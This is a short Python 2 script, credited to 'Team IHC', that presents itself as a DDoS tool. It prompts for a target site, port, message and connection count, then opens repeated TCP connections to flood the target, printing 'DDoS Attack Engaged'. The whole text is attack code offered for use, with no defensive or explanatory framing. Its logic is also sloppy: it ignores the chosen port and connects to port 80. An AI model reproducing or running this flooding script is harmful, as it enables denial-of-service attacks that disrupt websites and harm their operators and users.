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- #Team IHC #Ddos #Script
- import time
- import socket
- import os
- import sys
- import string
- #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
- def restart_program():
- python = sys.executable
- os.execl(python, python, * sys.argv)
- curdir = os.getcwd()
- #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
- print ("DDoS mode loaded")
- print ("python script made by Team IHC")
- host=raw_input( "Site you want to DDoS:" )
- port=input( "Port you want to attack:" )
- message=raw_input( "Input the message you want to send:" )
- conn=input( "How many connections you want to make:" )
- ip = socket.gethostbyname( host )
- print ("[" + ip + "]")
- print ( "[Ip is locked]" )
- print ( "[Attacking " + host + "]" )
- print ("+----------------------------+")
- def dos():
- #pid = os.fork()
- ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- try:
- ddos.connect((host, 80))
- ddos.send( message )
- ddos.sendto( message, (ip, port) )
- ddos.send( message );
- except socket.error, msg:
- print("|[Connection Failed] |")
- print ( "|[DDoS Attack Engaged] |")
- ddos.close()
- for i in range(1, conn):
- dos()
- print ("+----------------------------+")
- print("The connections you requested had finished")
- if __name__ == "__main__":
- answer = raw_input("Do you want to ddos more?")
- if answer.strip() in "y Y yes Yes YES".split():
- restart_program()
- else:
- os.system(curdir+"")
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